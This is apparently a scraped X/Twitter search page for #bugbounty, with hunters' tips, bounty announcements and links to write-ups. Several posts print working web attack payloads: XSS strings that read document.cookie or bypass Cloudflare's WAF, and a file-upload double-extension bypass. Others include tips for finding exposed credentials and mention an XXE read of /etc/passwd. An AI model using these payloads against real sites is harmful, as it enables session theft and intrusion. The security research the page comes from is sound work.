#bugbounty 搜尋結果
💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec



Unrestricted file-upload bypass: if a server trusts only Content-Type/extension, attackers can use Content-Disposition double-extensions to upload .asp/.php disguised as image/jpeg. magic-bytes ≠ MIME, presence of `<%...%>` or `<?php`, accessible executable URIs. #BugBounty

Accessing Amazon employee data using just a simple Continuum Recon and fuzzing technique > Pll leakage data #BugBounty #bugbountytips #bugbountytip #bug #Amazon #Security #CYBER #cybersecuritytips #H1

💡 Tip: always check .js files for Authorization: "Basic" You can often find unauthorized access and it can lead to critical bugs. #BugBounty #InfoSec #SecurityTips #InformationDisclosure


XSS Bypass Method: Payload: ">>>>>><marquee>RXSS</marquee></head><abc></script><script>alert(document.cookie)</script><meta #BugBounty #XSS

First Boolean‑based SQLi, still shaking 😭🔥! Reported and paused let’s goooo!, thanks for continuous support Everyone. #BugBounty #CyberSecurity #infosec #sql #web #bugbountytips @bugcrowd #Hacking

🚨 Bug Bounty Tip: Never skip Recon! One of the first steps in finding bugs is checking for pre-existing leaks. Use these data breach search engines to see what's already out there and guide your testing. 📷 #BugBounty #Hacking #tips #professor #the #hunter

I’m a junior bug bounty hunter. I submitted a bug and got NA. The bug was a 1-click ATO: send a link, the victim clicks, and the ATO is guaranteed. The triage team considered it social engineering and replied (image). 1/2 @Hacker0x01 #bugbounty

New XSS Bypass Cloudflare WAF 🧱 Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E #BugBounty #XSS #Cybersecurity

reading Js >> found an endpoint file inclusion >> LFI >> RCE :D Write-up will be published after fix on: blog.voorivex.team #BugBounty

First bounty on hackerone and critical on Inditex public program, after less than 24h of researching 🔥🔥 @Hacker0x01 #bugbounty

I've been hunting on the Shopify program for 2.5 years. Looking to collaborate with other hunters. Let’s team up and find some cool bugs! #bugbounty #hackerone #bugbountytips #bugbountyhunting #bugcrowd #hackers

New XSS Bypass Cloudflare WAF Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E #BugBounty #bugbountytips #infosec

Digging up old path traversal vulnerabilities? 🕵️♂️ I built this scanner for CVE-2022-37122 to help you find these classic bugs on your authorized targets: Github Tool: github.com/bughuntar/CVE-… #Cybersecurity #VulnerabilityScanner #BugBounty #bugbountytips #professor #the…

Huge thanks to @Hacker0x01 for hooking me up with a fresh Burp Suite Professional license again! 🤩 Time to put this to work and find some critical bugs. Let the hacking continue! 💻💰 #BugBounty #HackerOne #Infosec #BurpSuite #Professor #the #Hunter

XSS & CSRF for Beginners: Finding Easy Bug Bounties medium.com/@luismiguel.po… #bugbounty #bugbountytips #bugbountytip
Day 04: Grinded hard last night hunting for valid bugs in public programs, but struck out. Recharging for tonight's session—full consistency, max energy! Let's bag some bounties. #BugBounty #EthicalHacking #hackerlife #hack #bugbountytips #FreePalestine
reading Js >> found an endpoint file inclusion >> LFI >> RCE :D Write-up will be published after fix on: blog.voorivex.team #BugBounty

Active Recon for Bug Bounties: Port Scanning, Service Fingerprinting & Prioritization ⚡️ su6osec.medium.com/active-recon-f… #bugbounty #bugbountytips #bugbountytip
"Mañana anuncio mi nueva Masterclass de Bug Bounty" by Gorka #BugBounty #Cybersecurity #Hacking #InfoSec gorkaaa.medium.com/ma%C3%B1ana-an…
"The Access Control Apocalypse: How Broken Permissions Gave Me Keys to Every Digital Door" by Iski #BugBounty #Cybersecurity #Hacking #InfoSec infosecwriteups.com/the-access-con…
"Interesting : Profile Pictures CP DoS" by Exploit5lover #BugBounty #Cybersecurity #Hacking #InfoSec exploit5lovers.medium.com/interesting-pr…
"Master Advanced Netcat Usage for Hackers: Techniques Beyond Reverse Shells" by Very Lazy Tech #BugBounty #Cybersecurity #Hacking #InfoSec medium.com/@verylazytech/…
Attacking iOS: Elite Recon and Exploitation Guide For Bug Bounty Hunters anontriager.medium.com/attacking-ios-… #bugbounty #bugbountytips #bugbountytip
Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #InfoSec #BugBounty #XSS…

Digging up old path traversal vulnerabilities? 🕵️♂️ I built this scanner for CVE-2022-37122 to help you find these classic bugs on your authorized targets: Github Tool: github.com/bughuntar/CVE-… #Cybersecurity #VulnerabilityScanner #BugBounty #bugbountytips #professor #the…

Day 4/365 of the Until get 10.0 Critical report 📤 Reports Submitted:- 1 reported Critical idor 🟠 triaged -0 🟦 new status - 0 🟤 Duplicate - 0 🟣 New -3 💰 Paid - 0 💻 Worked - Working like 7 hour still working learned 3 hour #bugbounty
Coffee Corner CTF: A Security Journey medium.com/@momenrezkk90/… #bugbounty #bugbountytips #bugbountytip
AUTOMATE THE MOST POWERFUL SECURITY TOOLS Check our YouTube channel to see how Sn1per can help your security team! youtube.com/c/Sn1perSecuri… External Attack Surface Management | Offensive Security | Penetration Testing | OSINT | Bug Bounty #infosec #bugbounty #netsec #offsec

v2.0 of xnldorker is available: ✅ Add new source: Ecosia search engine ✅ Add new source: Baidu search engine ✅ See CHANGELOG ✅ Update with "pip install --upgrade xnldorker" github.com/xnl-h4ck3r/xnl… #BugBounty 🤘
Enough SQLI's for today ( part 2 ) Thanks @intigriti <3 #BugBounty #BugBountyLife #EthicalHacking #CyberSecurity #InfoSec #SQLi #WebSecurity #KeepHacking

XSS & CSRF for Beginners: Finding Easy Bug Bounties medium.com/@ibtissamhamma… #bugbounty #bugbountytips #bugbountytip
Apple'dan çarpıcı karar. Tespit edebilene milyon dolarlar verecek! baskagazete.com/haber/apple-da… #apple #bugbounty

30-Day Bug Bounty Challenge #Day: [ 70 ] Hanting : 1.45 h 📕 Study : 30 min 🕷️ Bugs reported: [ 0 ] + total bugs reported : [ 7 ] ============== #BugBounty #InfoSec #BugHunter #Recon
30-Day Bug Bounty Challenge #Day: [ 69 ] Hanting : 4.25 h 📕 Study : 0 min 🕷️ Bugs reported: [ 1 ] + total bugs reported : [ 7 ] ============== الحمد الله ، لقيت ثغرة 'Low' ، بالأحرى ثغرتين مع بعض. بس الموقع VDP 🥲 #BugBounty #InfoSec #BugHunter #Recon
![Kai_Vritra's tweet image. 30-Day Bug Bounty Challenge
#Day: [ 69 ]
Hanting : 4.25 h
📕 Study : 0 min
🕷️ Bugs reported: [ 1 ]
+ total bugs reported : [ 7 ]
==============
الحمد الله ، لقيت ثغرة 'Low' ، بالأحرى ثغرتين مع بعض. بس الموقع VDP 🥲
#BugBounty
#InfoSec
#BugHunter
#Recon](https://pbs.twimg.com/media/G27nM0kWcAIUwOM.jpg)
I talked to multiple hackers today and the more I talk to them the more I learn new and creative ways people hack stuff 🙌 It's always refreshing hearing these hacker stories. One common trait I've seen is most of these hackers love playing video games. #BugBounty
XSS Bypass Method: Payload: ">>>>>><marquee>RXSS</marquee></head><abc></script><script>alert(document.cookie)</script><meta #BugBounty #XSS

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec



It's fantastic to receive this feedback and $2000 reward. This is exactly the motivation I need to hunt for bugs every day. #bugbounty #motivation


Today I received the gift sent by Google VRP. Thank you so much for the beautiful hoodies you sent me. @GoogleVRP & @Google ❤️❤️ @AtaTurk1925 ❤️😘❤️😘❤️ #BugBounty


Accessing Amazon employee data using just a simple Continuum Recon and fuzzing technique > Pll leakage data #BugBounty #bugbountytips #bugbountytip #bug #Amazon #Security #CYBER #cybersecuritytips #H1

Pulled /etc/passwd for the first time via an out-of-band XXE on the main application. feels so damn goooooood! #BugBounty


I am not that into bug bounty hunting anymore, but if I need a larger amount of money for a side project, I usually simply start... and its always the same... there is always stuff to find.😂 #pentesting #bugbounty #bbp #hackerone

Alhamdulillah, I received a €2900 bounty for responsibly reporting four IDOR vulnerabilities through @yeswehack #say_mashallah #YesWeHack #BugBounty




📌CVE-2025-32463 -Local Privilege Escalation Vulnerability in Sudo📌 -In the article below, I explained how CVE-2025-32463 can be easily exploited using a vulnerability in the sudo version, along with a POC file. #BugBounty #CyberSecurity

I’m a junior bug bounty hunter. I submitted a bug and got NA. The bug was a 1-click ATO: send a link, the victim clicks, and the ATO is guaranteed. The triage team considered it social engineering and replied (image). 1/2 @Hacker0x01 #bugbounty

Alhamdulillah, I received a €950 bounty for responsibly reporting two IDOR vulnerabilities through @yeswehack #say_mashallah #YesWeHack #BugBounty


💡 Tip: always check .js files for Authorization: "Basic" You can often find unauthorized access and it can lead to critical bugs. #BugBounty #InfoSec #SecurityTips #InformationDisclosure


Validated! Improper Authorization, escalated to ATO (account takeover) and then mass user data exposure via /api/user, concluding a Critical Severity 9.1. Ty @intigriti #bugbounty #bugbountytips #bugbountytip

This is an old writeup by @ozgur_bbh from four years back, a very successful #bugbounty hunter. I feel it still holds relevance if you're planning to start doing it as a side gig, even in 2025. Link 👇

Something went wrong.
Something went wrong.
United States Trends
- 1. Auburn 45K posts
- 2. Brewers 63.6K posts
- 3. Georgia 67.6K posts
- 4. Cubs 55.5K posts
- 5. Kirby 23.7K posts
- 6. Arizona 41.8K posts
- 7. Utah 24.5K posts
- 8. Gilligan 5,818 posts
- 9. Michigan 62.7K posts
- 10. #AcexRedbull 3,597 posts
- 11. Hugh Freeze 3,211 posts
- 12. #BYUFootball N/A
- 13. Boots 50.5K posts
- 14. #Toonami 2,534 posts
- 15. Amy Poehler 4,303 posts
- 16. #GoDawgs 5,555 posts
- 17. Kyle Tucker 3,167 posts
- 18. Dissidia 5,517 posts
- 19. #ThisIsMyCrew 3,233 posts
- 20. Tina Fey 3,291 posts